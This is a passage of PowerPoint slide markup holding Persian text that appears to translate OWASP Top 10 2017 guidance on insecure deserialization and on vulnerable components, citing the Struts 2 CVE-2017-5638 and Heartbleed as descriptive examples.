                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>به عنوان </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>off</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> the shelf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>بهره برداری به ندرت بدون تغییر و یا</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> پیچاندن کد بهره برداری اصلی است</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>این مسئله در </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>بر اساس تحقیقات</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>صنعت و نه بر روی داده های قابل اندازه گیری وجود دارد.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>بعضی از ابزارها می توانند نقص های </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>را بیابند، اما برای کمک به اعتباربخشی، اغلب نیاز به کمک انسانی است. انتظار می رود که داده های شایع و پخش شده برای نقص های </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> افزایش یابد، زیرا ابزارهایی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> جهت کمک به شناسایی و پیدا کردن آدرس آنها توسعه یافته اند. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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gn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تاثير نقص </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>نمی تواند کم اهميت باشد. این نقص ها می تواند به اجرای کد از راه دور منجر شود، که یکی از جدی ترین حملات ممکن است.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تاثیر کسب و کار بستگی به نیازهای حفاظت از برنامه و داده ها دارد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نمونه‌ سناریوهای حمله</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 1: مولفه ها معمولا با همان امتیازات به عنوان برنامه کاربردی اجرا می شوند، بنابراین نقص در هر جزء می تواند تاثیر جدی داشته باشد. چنین نقصی می تواند تصادفی باشد (مثلا خطای برنامه نویسی) یا عمدی (به عنوان مثال در قسمت پشتی). بعضی از موارد آسیب پذیری مولفه که مورد سواستفاده قرار می گیرند :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>CVE-2017-5638، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یک آسیب پذیری با قابلیت کنترل از راه دور </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Struts 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> که باعث اجرای کد دلخواه بر روی سرور را امکان پذیر می سازد، به خاطر رخنه قابل توجه مورد نقد قرار گرفته است.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">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در حالی که وصله کردن اینترنت اشیا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>IOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> اغلب پیچیده یا غیرممکن است، اهمیت وصله کردن آنها میتواند عالی باشد (به عنوان مثال دستگاههای پزشکی).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ابزارهای خودکاری برای کمک به مهاجمین وجود دارد که سیستم های سیستم های با پیکربندی اشتباه و وصله نشده را پیدا می کنند. به عنوان مثال، موتور جستجو </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>IoT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>می تواند به شما در پیدا کردن دستگاه هایی که هنوز از آسیب پذیری </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Heartbleed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>که در آوریل 2014 رفع شده است کمک شایانی می کند. </a:t>
            </a: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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا برنامه کاربردی آسیب‌پذیر است؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شما احتمالا آسیب پذیر هستید:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">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اگر نسخه های تمام مولفه هایی که از آنها استفاده می کنید را نشناسید (هر دو طرف و سمت سرور). این شامل اجزایی است که به طور مستقیم از وابستگی های تو در تو (توزیع شده) استفاده می کنند .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">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اگر نرم افزار آسيب پذير، پشتیبانی نشده يا بروز نباشد. این شامل سیستم عامل، وب / برنامه سرور، سیستم مدیریت پایگاه داده (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DBMS)، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برنامه ها، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> ها و تمام مولفه های سازنده، محیط های زمان اجرا و کتابخانه ها می باشد.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">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اگر شما به طور منظم آسیب پذیری ها را اسکن نمی کنید و امنیت بخش هایی که از آنها استفاده می کنید را کنترل نکنید. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">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اگر پلت فرم، چارچوب ها و وابستگی ها را در یک مد مبتنی بر ریسک تنظیم نکنید یا ارتقاء ندهید. این معمولا در محیط ها اتفاق می افتد وقتی که وصله امنیتی کردن</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یک وظیفه ماهانه یا سه ماهه ای است که تحت کنترل تغییر است، که سازمان ها را چندین روز یا چند ماه از مواجه ه  غیرضروری برای رفع آسیب پذیری ها مشغول می سازد.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">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اگر توسعه دهندگان نرم افزار سازگاری کتابخانه های به روز شده، ارتقا داده شده یا وصله شده را تست نکنند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="r" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اگر تنظیمات اجزاء را امن نکنید (نگاه کنید به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>A6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>: ۲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>017-Misconfiguration Security).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <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fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
